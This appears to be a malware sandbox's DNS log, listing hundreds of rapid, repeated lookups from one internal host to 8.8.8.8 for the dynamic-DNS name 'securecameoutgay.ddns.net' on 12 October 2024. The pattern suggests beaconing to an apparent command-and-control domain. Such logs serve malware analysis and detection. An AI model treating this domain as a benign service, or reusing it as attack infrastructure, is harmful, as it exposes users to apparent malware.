                                                    Oct 12, 2024 23:05:45.861190081 CEST192.168.2.148.8.8.80x5b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.867948055 CEST192.168.2.148.8.8.80x5b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.874643087 CEST192.168.2.148.8.8.80x5b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.881405115 CEST192.168.2.148.8.8.80x5b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.888171911 CEST192.168.2.148.8.8.80x5b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.895750046 CEST192.168.2.148.8.8.80xbc12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.903296947 CEST192.168.2.148.8.8.80xbc12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.909787893 CEST192.168.2.148.8.8.80xbc12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.916352987 CEST192.168.2.148.8.8.80xbc12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.924175024 CEST192.168.2.148.8.8.80xbc12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.931303978 CEST192.168.2.148.8.8.80xe385Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.937836885 CEST192.168.2.148.8.8.80xe385Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.944596052 CEST192.168.2.148.8.8.80xe385Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.950995922 CEST192.168.2.148.8.8.80xe385Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.957324028 CEST192.168.2.148.8.8.80xe385Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.964234114 CEST192.168.2.148.8.8.80xc6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.971240044 CEST192.168.2.148.8.8.80xc6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.978857994 CEST192.168.2.148.8.8.80xc6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.985708952 CEST192.168.2.148.8.8.80xc6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.992491007 CEST192.168.2.148.8.8.80xc6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.999114990 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.005933046 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.012526989 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.019112110 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.025932074 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.032783031 CEST192.168.2.148.8.8.80x5d83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.039527893 CEST192.168.2.148.8.8.80x5d83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.046154976 CEST192.168.2.148.8.8.80x5d83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.052829027 CEST192.168.2.148.8.8.80x5d83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.059299946 CEST192.168.2.148.8.8.80x5d83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.066328049 CEST192.168.2.148.8.8.80x4b09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.073137999 CEST192.168.2.148.8.8.80x4b09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.079958916 CEST192.168.2.148.8.8.80x4b09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.086446047 CEST192.168.2.148.8.8.80x4b09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.092993021 CEST192.168.2.148.8.8.80x4b09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.099797010 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.106493950 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.113152981 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.119525909 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.126529932 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.133420944 CEST192.168.2.148.8.8.80x9a41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.140127897 CEST192.168.2.148.8.8.80x9a41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.146774054 CEST192.168.2.148.8.8.80x9a41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.153491974 CEST192.168.2.148.8.8.80x9a41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.160341978 CEST192.168.2.148.8.8.80x9a41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.167264938 CEST192.168.2.148.8.8.80x3295Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.174288988 CEST192.168.2.148.8.8.80x3295Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.180996895 CEST192.168.2.148.8.8.80x3295Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.187908888 CEST192.168.2.148.8.8.80x3295Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.194952965 CEST192.168.2.148.8.8.80x3295Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.202091932 CEST192.168.2.148.8.8.80xf3b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.208787918 CEST192.168.2.148.8.8.80xf3b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.215331078 CEST192.168.2.148.8.8.80xf3b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.222806931 CEST192.168.2.148.8.8.80xf3b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.229348898 CEST192.168.2.148.8.8.80xf3b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.236180067 CEST192.168.2.148.8.8.80x93baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.243010044 CEST192.168.2.148.8.8.80x93baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.251617908 CEST192.168.2.148.8.8.80x93baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.258100033 CEST192.168.2.148.8.8.80x93baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.264727116 CEST192.168.2.148.8.8.80x93baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.271236897 CEST192.168.2.148.8.8.80x9845Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.277522087 CEST192.168.2.148.8.8.80x9845Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.284310102 CEST192.168.2.148.8.8.80x9845Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.290819883 CEST192.168.2.148.8.8.80x9845Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.297945976 CEST192.168.2.148.8.8.80x9845Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.304723978 CEST192.168.2.148.8.8.80xbd9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.311678886 CEST192.168.2.148.8.8.80xbd9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.319062948 CEST192.168.2.148.8.8.80xbd9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.326199055 CEST192.168.2.148.8.8.80xbd9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.333172083 CEST192.168.2.148.8.8.80xbd9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.339915991 CEST192.168.2.148.8.8.80xab21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.346504927 CEST192.168.2.148.8.8.80xab21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.353198051 CEST192.168.2.148.8.8.80xab21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.360480070 CEST192.168.2.148.8.8.80xab21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.367094040 CEST192.168.2.148.8.8.80xab21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.374208927 CEST192.168.2.148.8.8.80x11aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.380919933 CEST192.168.2.148.8.8.80x11aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.390381098 CEST192.168.2.148.8.8.80x11aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.397496939 CEST192.168.2.148.8.8.80x11aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.405975103 CEST192.168.2.148.8.8.80x11aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.412935972 CEST192.168.2.148.8.8.80xc056Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.419799089 CEST192.168.2.148.8.8.80xc056Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.426722050 CEST192.168.2.148.8.8.80xc056Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.433521032 CEST192.168.2.148.8.8.80xc056Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.440330029 CEST192.168.2.148.8.8.80xc056Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.447387934 CEST192.168.2.148.8.8.80x8156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.454121113 CEST192.168.2.148.8.8.80x8156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.462951899 CEST192.168.2.148.8.8.80x8156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.469784021 CEST192.168.2.148.8.8.80x8156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.476653099 CEST192.168.2.148.8.8.80x8156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.483510971 CEST192.168.2.148.8.8.80xe367Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.490581989 CEST192.168.2.148.8.8.80xe367Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.497838974 CEST192.168.2.148.8.8.80xe367Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.505243063 CEST192.168.2.148.8.8.80xe367Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.512185097 CEST192.168.2.148.8.8.80xe367Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.519701958 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.528561115 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.535141945 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.541843891 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.548367977 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.555162907 CEST192.168.2.148.8.8.80xd1a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.562002897 CEST192.168.2.148.8.8.80xd1a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.568756104 CEST192.168.2.148.8.8.80xd1a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.576093912 CEST192.168.2.148.8.8.80xd1a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.586278915 CEST192.168.2.148.8.8.80xd1a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.592993975 CEST192.168.2.148.8.8.80xedc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.599606991 CEST192.168.2.148.8.8.80xedc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.606220007 CEST192.168.2.148.8.8.80xedc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.612618923 CEST192.168.2.148.8.8.80xedc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.619158983 CEST192.168.2.148.8.8.80xedc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.626044989 CEST192.168.2.148.8.8.80xd666Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.632708073 CEST192.168.2.148.8.8.80xd666Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.639555931 CEST192.168.2.148.8.8.80xd666Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.646249056 CEST192.168.2.148.8.8.80xd666Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.652731895 CEST192.168.2.148.8.8.80xd666Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.659322977 CEST192.168.2.148.8.8.80x28cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.665986061 CEST192.168.2.148.8.8.80x28cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.672861099 CEST192.168.2.148.8.8.80x28cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.679620028 CEST192.168.2.148.8.8.80x28cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.686470985 CEST192.168.2.148.8.8.80x28cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.694684982 CEST192.168.2.148.8.8.80xf48bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.701435089 CEST192.168.2.148.8.8.80xf48bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.712158918 CEST192.168.2.148.8.8.80xf48bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.720149040 CEST192.168.2.148.8.8.80xf48bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.726918936 CEST192.168.2.148.8.8.80xf48bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.733788013 CEST192.168.2.148.8.8.80xd3afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.740420103 CEST192.168.2.148.8.8.80xd3afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.747347116 CEST192.168.2.148.8.8.80xd3afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.754678965 CEST192.168.2.148.8.8.80xd3afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.761706114 CEST192.168.2.148.8.8.80xd3afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.768441916 CEST192.168.2.148.8.8.80xf8b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.775283098 CEST192.168.2.148.8.8.80xf8b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.782586098 CEST192.168.2.148.8.8.80xf8b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.789362907 CEST192.168.2.148.8.8.80xf8b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.795968056 CEST192.168.2.148.8.8.80xf8b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.803107023 CEST192.168.2.148.8.8.80x6e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.809432030 CEST192.168.2.148.8.8.80x6e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.816160917 CEST192.168.2.148.8.8.80x6e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.822990894 CEST192.168.2.148.8.8.80x6e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.829760075 CEST192.168.2.148.8.8.80x6e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.836529970 CEST192.168.2.148.8.8.80x82d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.842971087 CEST192.168.2.148.8.8.80x82d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.849541903 CEST192.168.2.148.8.8.80x82d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.856802940 CEST192.168.2.148.8.8.80x82d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.863742113 CEST192.168.2.148.8.8.80x82d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.872786999 CEST192.168.2.148.8.8.80xe706Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.879429102 CEST192.168.2.148.8.8.80xe706Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.886084080 CEST192.168.2.148.8.8.80xe706Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.893054008 CEST192.168.2.148.8.8.80xe706Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.899862051 CEST192.168.2.148.8.8.80xe706Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.906672001 CEST192.168.2.148.8.8.80x98d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.913378000 CEST192.168.2.148.8.8.80x98d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.920126915 CEST192.168.2.148.8.8.80x98d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.926635981 CEST192.168.2.148.8.8.80x98d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.933151960 CEST192.168.2.148.8.8.80x98d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.940401077 CEST192.168.2.148.8.8.80xe558Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.946784973 CEST192.168.2.148.8.8.80xe558Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.953957081 CEST192.168.2.148.8.8.80xe558Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.960527897 CEST192.168.2.148.8.8.80xe558Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.967001915 CEST192.168.2.148.8.8.80xe558Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.973476887 CEST192.168.2.148.8.8.80xc722Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.980066061 CEST192.168.2.148.8.8.80xc722Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.986605883 CEST192.168.2.148.8.8.80xc722Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.993362904 CEST192.168.2.148.8.8.80xc722Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:46.999553919 CEST192.168.2.148.8.8.80xc722Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.006630898 CEST192.168.2.148.8.8.80x343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.013326883 CEST192.168.2.148.8.8.80x343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.020311117 CEST192.168.2.148.8.8.80x343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.027174950 CEST192.168.2.148.8.8.80x343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.034092903 CEST192.168.2.148.8.8.80x343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.041464090 CEST192.168.2.148.8.8.80x22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.048429966 CEST192.168.2.148.8.8.80x22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.055612087 CEST192.168.2.148.8.8.80x22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.062467098 CEST192.168.2.148.8.8.80x22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.069112062 CEST192.168.2.148.8.8.80x22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.075771093 CEST192.168.2.148.8.8.80x7804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.082381010 CEST192.168.2.148.8.8.80x7804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.088934898 CEST192.168.2.148.8.8.80x7804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.096086025 CEST192.168.2.148.8.8.80x7804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.102910042 CEST192.168.2.148.8.8.80x7804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.109438896 CEST192.168.2.148.8.8.80xa011Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.116089106 CEST192.168.2.148.8.8.80xa011Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.122832060 CEST192.168.2.148.8.8.80xa011Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.129964113 CEST192.168.2.148.8.8.80xa011Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.136938095 CEST192.168.2.148.8.8.80xa011Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.144762993 CEST192.168.2.148.8.8.80xfd24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.151462078 CEST192.168.2.148.8.8.80xfd24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.158185959 CEST192.168.2.148.8.8.80xfd24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
